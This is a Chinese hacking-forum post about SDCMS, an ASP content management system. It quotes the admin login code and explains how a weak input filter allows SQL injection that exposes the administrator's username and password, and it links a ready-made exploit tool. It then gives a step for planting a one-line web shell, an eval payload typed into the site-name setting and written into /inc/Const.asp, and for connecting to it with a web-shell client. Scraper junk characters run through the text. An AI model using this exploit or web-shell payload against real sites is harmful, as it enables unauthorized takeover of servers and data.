标题: SDCMS通杀漏洞利用工具及提权拿SHELL [打印本页] 作者: admin 时间: 2012-11-9 20:57 标题: SDCMS通杀漏洞利用工具及提权拿SHELL 作者:T00LS 鬼哥0 g% T1 U% E* ?* _* p9 T1 \
漏洞文件:后台目录/index.asp : P( V' h! j# u / K" f* z* _2 q L8 tSub Check $ |6 K3 ?' T! |* [/ ^ Dim username,password,code,getcode,Rs $ `# L" {, J* u8 e! p+ W: N" u5 E IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub & v0 r* M- h) J7 Q- e username=FilterText(Trim(Request.Form("username")),1) , Q& e( X1 F( b4 {% u, K password=FilterText(Trim(Request.Form("password")),1) $ e6 `6 T* n* K) l code=Trim(Request.Form("yzm")) 4 A2 J4 `- Q% Q) T3 u getcode=Session("SDCMSCode") 2 H: K# c3 m" x6 M IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died0 J. a6 f' k. R& B& a
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)"ied , {4 h* E2 b W. j- b IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied 8 h4 |- q; S( k' U IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied# W. H& Y _; N5 k
IF username="" or password="" Then " Y' Z0 t) u- F3 z; v Echo "用户名或密码不能为空"ied ' b( |+ p+ ?5 X Else 4 }+ A/ ]- }5 z( E Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")% k' ~8 W& \, b- M' y8 G+ d
IF Rs.Eof Then n- Y8 C* z, f) X AddLog username,GetIp,"登录失败",1# r0 E2 ^$ C4 Z2 Z8 O
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"8 }: P7 {4 @! A
Else & K( H- T+ f# X0 W( h$ f Add_Cookies "sdcms_id",Rs(0) " \7 e; v$ f3 ? Add_Cookies "sdcms_name",username 2 Y3 i* X( {) z0 L Add_Cookies "sdcms_pwd",Rs(2) + \- }( `* H5 z; a) W Add_Cookies "sdcms_admin",Rs(3) 5 M/ ?' a. \# }; t/ j- X; L2 L, { Add_Cookies "sdcms_alllever",Rs(4); ], C: X i5 l, z) D. \( g% g
Add_Cookies "sdcms_infolever",Rs(5)( D1 I3 v0 X1 h. I- ^* g
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")* f! D8 v8 |/ M+ l
AddLog username,GetIp,"登录成功",1 9 f# U, }: O1 R '自动删除30天前的Log记录( m1 R+ ]& X+ b0 a
IF Sdcms_DataType Then : T( |1 z& i- A Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")5 b9 N$ ^. H1 r( j
Else 5 U; P8 z( v# @& R5 D7 o9 J* K Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")- V. x9 x2 e1 d' f
End IF: M- j! K3 X0 W7 ?9 r6 Z
Go("sdcms_index.asp")5 H) q; X/ V' @ d! l7 [
End IF+ s! A! I" Y: W4 r; J
Rs.Close! {6 p: }6 m7 M: G- h
Set Rs=Nothing/ j& n, T7 T( E% H m" \
End IF 6 ]" ]/ g+ [. IEnd Sub) _& W4 D: ]# b7 z l, Q0 [( ^' @6 ~
/ d# k3 p. t2 r2 ~; S’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码 9 I% F1 t( p4 [: p ! c1 ]+ n4 g# V, T8 n, sFunction FilterText(ByVal t0,ByVal t1) - K. Q' ~) e1 K2 f; L: d IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function; x* b0 p% W( q1 D
t0=Trim(t0) ) E6 S/ v' N6 X6 z% J) j3 |8 G3 J Select Case t14 |7 F) x4 O' \' c* T
Case "1" - @& k0 ^! z! u; R* @" A+ _! k" Y t0=Replace(t0,Chr(32),""), f8 ], U3 U+ n' M0 U* a3 ^
t0=Replace(t0,Chr(13),"")( |" h( B y: N7 A& h, l" j
t0=Replace(t0,Chr(10)&Chr(10),"") ' { a# |1 \1 q$ I t0=Replace(t0,Chr(10),"") , b9 V5 a/ y4 v2 @: { Case "2" _' T1 }8 x0 d1 x7 d8 Y; F' G+ Y t0=Replace(t0,Chr(8),"")'回格( J& ?/ K' ^2 G6 Y, L% o
t0=Replace(t0,Chr(9),"")'tab(水平制表符) / P/ @- Y2 v% ~. V, U9 }4 L8 Z4 A t0=Replace(t0,Chr(10),"")'换行4 a2 o& x( R8 Q a- e1 ~
t0=Replace(t0,Chr(11),"")'tab(垂直制表符) 4 U# k' ~7 d1 `# M# o/ _& Q/ C t0=Replace(t0,Chr(12),"")'换页 2 U2 R- H1 y+ c' j. U t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合! M/ W# W* J4 Y2 Y
t0=Replace(t0,Chr(22),"") ! w. l7 K! H+ l% L" ? o6 C7 F t0=Replace(t0,Chr(32),"")'空格 SPACE % q6 x9 s# z) O8 B" A- B+ V t0=Replace(t0,Chr(33),"")'!! k3 F |6 f3 Q% ^5 [' l
t0=Replace(t0,Chr(34),"")'" 9 o) a- o4 E6 r) _' d' ?3 E t0=Replace(t0,Chr(35),"")'#" I6 O, l( m. s% I
t0=Replace(t0,Chr(36),"")'$ # j# I5 Z: G0 y$ O1 l t0=Replace(t0,Chr(37),"")'%+ m% i& }7 {$ n& y
t0=Replace(t0,Chr(38),"")'& * }$ e7 Z( n% s9 L( | t0=Replace(t0,Chr(39),"")'' 3 R" i/ g S- w6 P7 Z( V t0=Replace(t0,Chr(40),"")'( 3 H8 E" g! }6 ]$ D t0=Replace(t0,Chr(41),"")')0 _1 f7 [1 w) C6 n; J$ I/ Y% q
t0=Replace(t0,Chr(42),"")'* : ^6 y+ i' q" `7 K% l' L/ r t0=Replace(t0,Chr(43),"")'+8 o3 S" ], f# g+ O* C
t0=Replace(t0,Chr(44),"")',& [. F) N( `% A1 F6 h. V
t0=Replace(t0,Chr(45),"")'- 8 r w5 `$ _2 Y) ^, Y4 j _1 N t0=Replace(t0,Chr(46),"")'.# O& D v4 G& B; x! a! a0 z
t0=Replace(t0,Chr(47),"")'/2 D! m8 V! I& T9 G
t0=Replace(t0,Chr(58),"")':* V3 N" i) I. c
t0=Replace(t0,Chr(59),"")'; $ `$ M3 L/ k4 K, \0 V9 P, H4 q8 u t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>& Z$ b4 x$ p: t H
t0=Replace(t0,Chr(63),"")'?0 o0 |: ]; ^/ s2 N+ L. _
t0=Replace(t0,Chr(64),"")'@- ?) e" Z, n9 Q$ I! i7 Y
t0=Replace(t0,Chr(91),"")'\' V$ u7 _ `5 l& f$ a1 I
t0=Replace(t0,Chr(92),"")'\3 q% r. e5 X% N9 L$ k
t0=Replace(t0,Chr(93),"")']3 k0 T7 ]' s" p3 A: a* ]
t0=Replace(t0,Chr(94),"")'^" _% M2 n# q8 P3 G! B; X2 o
t0=Replace(t0,Chr(95),"")'_ & B) K# Z7 E' y. @7 R! P t0=Replace(t0,Chr(96),"")'`; a: h1 G0 H, h6 H. k, Z
t0=Replace(t0,Chr(123),"")'{& e6 S3 g/ h9 y# P: m/ @. ^
t0=Replace(t0,Chr(124),"")'|4 f2 K0 n( o/ f7 f8 b& o
t0=Replace(t0,Chr(125),"")'} ' c9 I; i" b( Q0 c1 @4 m t0=Replace(t0,Chr(126),"")'~, }6 a9 C4 R" G9 T8 l
Case Else( T7 A. u- ]2 H3 i$ Z# ]
t0=Replace(t0, "&", "&")" Z3 D6 E; H3 `) g t8 @
t0=Replace(t0, "'", "'") ! _( u$ f) D; K4 ` t0=Replace(t0, """", """)5 C4 }/ A9 x9 Y: e2 A5 }. V
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")3 X8 ]1 e9 m5 R$ Z! @
End Select 1 J; E! P% \6 w- P! m IF Instr(Lcase(t0),"expression")>0 Then 9 Y( j9 \2 y | z t0=Replace(t0,"expression","e­xpression", 1, -1, 0) 4 g$ X4 E$ }( w% X2 D3 Q End If " i8 n. K# H$ F/ F FilterText=t0; P$ |' Q8 X9 B/ F! j% J1 y+ a7 a
End Function; W. N2 e) ?% ]
+ h) o% x0 b$ J8 B& S
看到没。直接参数是1 只过滤( B" f5 y- P A* \. H
t0=Replace(t0,Chr(32)," "). {' w2 @' H; O
t0=Replace(t0,Chr(13),"") |- _0 Q* a6 n" B# x C
t0=Replace(t0,Chr(10)&Chr(10),"+ c$ O7 z) L6 U
") ) u" J }1 g+ b8 Z t0=Replace(t0,Chr(10),"& q s4 S/ O& b0 ]7 m0 f* m
")8 `: I+ R# H1 I2 G! C ]# L' h
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!, e% C2 U) `4 i
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP / b2 k5 C b% u. R7 _ }: K* @& I* B: y5 u& J8 W
测试:0 p! d8 ?* o/ s1 A2 ?3 s
9 d5 E: w' f% z( i! }9 K9 p " T1 e) ^6 o4 l2 m B$ {现在输入工具上验证码,然后点OK $ \# g, R6 B* _4 r: M% i0 P8 h* d5 j' E; H& h
9 A; k& G" M b# z
看到我们直接进入后台管理界面了,呵呵! F, _' {! h4 @4 O6 C
. [/ z6 F- r1 k. i/ J H
t) w' z+ p% _) _! }
* p, ]5 r& D6 I$ l0 U
这样直接进入后台了。。。。 - d) Y: J) O5 a' k L! b5 A7 @' }9 t' m- {
}6 [2 @" D5 p; ~ - n' [2 x7 ^% P( w5 ]2 kSDCMS提权:7 F c# Q; t# n0 h, U5 v% _
+ w8 z' m3 ~8 R
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是? ( a" _2 f- p$ j4 k, t& F6 N 7 p, X- c' I! w. m # c# J8 ]3 U8 B) O/ E& x( R+ i4 V' K+ u) d, n K! t
OK,现在用菜刀连接下!* H) K) A. ^2 h
" u$ j( M1 O# N f/ q* H
ied